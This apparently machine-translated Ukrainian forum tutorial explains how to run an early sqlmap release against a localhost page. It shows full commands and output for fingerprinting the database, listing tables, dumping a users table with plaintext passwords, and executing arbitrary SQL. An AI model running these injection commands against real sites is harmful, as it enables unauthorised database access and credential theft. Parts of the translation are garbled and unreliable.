//прошу пробачити мене за повторне відправлення даній статті. на жаль, на початку я //не вказав ім’я автора. так і було кілька недоліків бо я тільки //реєструвався
//і не встиг ознайомитися з усім. надалі такого не повториться. якщо ви //порахуйте за потрібне розмістити мою скромну статтю то прошу вас видалити //рядка які я помитиел символом коментарію://.

Програма призначена для автоматизації blind SQL Injection. Завантажити її можна звідси. Скачали?
Тепер разархивируем його. Єси вам не знайоме розширення ру спокійно!!! Це не звір:))) Просто це програма написана на відносно новому мовою програмування Пітон (Python). Запускати програму потрібно sqlmap.py. Щоб запустити її, потрібно просто перекинути її в cmd. Для тих хто не знає. Щоб запустити cmd нуно натиснути Start–>Run–>cmd. Запустили? Молодці:)) Тепер щоб юзати її нуно знову кинути прогу в cmd (або натиснути на кнопку «вгору» якщо цмдм не закривали) і набрати команду наприклад h що знову ж таки призведе список всіх команд даної проги. Отже розібралися з цією частиною? Йдемо вперед.
Хотів би разачаровать всіх ламерів тому що вразливість замість вас прога шукати не буде. Уразливий сай потрібно спочатку знайти самому і тільки потім почати юзати прогу. Ну припустимо сайт ми знайшли наприклад localhost/articles.php?id=1&cat=2. Припустимо що нефильтруемая мінлива це id. Потрібні параметри для успішного злому це:
-u localhost/blind/showcontent.php?id=TOKEN&cat=2
-t TOKEN
-d 1
Отже почнемо:
–BANNER GRABBING:
[503] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 banner —

sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 12:53:21

remote СУБД: MySQL

banner: ‘4.1.15-Debian_1ubuntu5-log’

[*] shutting down at: 12:53:22

–CURRENT USER:
[505] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 –current-user
sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:01:01

remote СУБД: MySQL

current user: [email protected]’

[*] shutting down at: 02:01:01

–CURRENT DATABASE
[506] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 –current-database

sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:01:28

remote СУБД: MySQL

current database: ‘blind’

[*] shutting down at: 02:01:28

–AVAILABLE PRESENT DBS
[509] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 –get-dbs
sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:02:22

remote СУБД: MySQL

available database:

[*] information_schema
[*] blind
[*] mysql
[*] test

[*] shutting down at: 02:02:25

Дамп таблиці
Тепер давайте зробимо дамп таблиці. (db:blind).
Давайте дістанемо імена таблиць db ‘blind’:

[510] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 –database blind –get-tables

sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:03:20

remote СУБД: MySQL

—————————–
DATABASE: blind
—————————–
news
users
—————————–

[*] shutting down at: 02:03:21

DUMP OF ‘news’ table:

[511] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 –database blind –table news –dump

sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:03:41

remote СУБД: MySQL

DATABASE: blind TABLE: news
————————————————————————————————-
|news |id |highlight
————————————————————————————————-
|ciao da daniele |1 |numero 1
|sempre ciao da daniele |2 |numero 2
|sempre sempre ciao da daniele |3 |numero 3
————————————————————————————————-

[*] shutting down at: 02:03:47

DUMP OF ‘users’ table:
[512] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 –database blind –table users –dump

sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:04:05

remote СУБД: MySQL

DATABASE: blind TABLE: користувачі
————————————-
|username |password |id
————————————-
|daniele |bellucci |1
|mancinelli |mancio |2
————————————-

[*] shutting down at: 02:04:08

–ESECUZIONE SINGOLI STATEMENT:
[518] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 -e «select version()»

sqlmap() v0.1 coded by belch <[email protected]>

[*] starting at: 02:06:15

remote СУБД: MySQL

select version(): ‘5.0.22-Debian_0ubuntu6.06-log’

None
[*] shutting down at: 02:06:16

При написанні цієї статті використовувався файл README в архіві. Хотів би також сказати щоб зробити ін’єкцію за допомогою даної прогу в уразливому саете обидві змінні повинні бути диманическими т. е числовими. Наприклад прога запрацює тільки якщо URL такий:
localhost/articles.php?id=1&cat=2
Якщо він буде такий:
localhost/articles.php?id=news&cat=2 то прога не запрацює видавши эрор що параметр news не динамічний.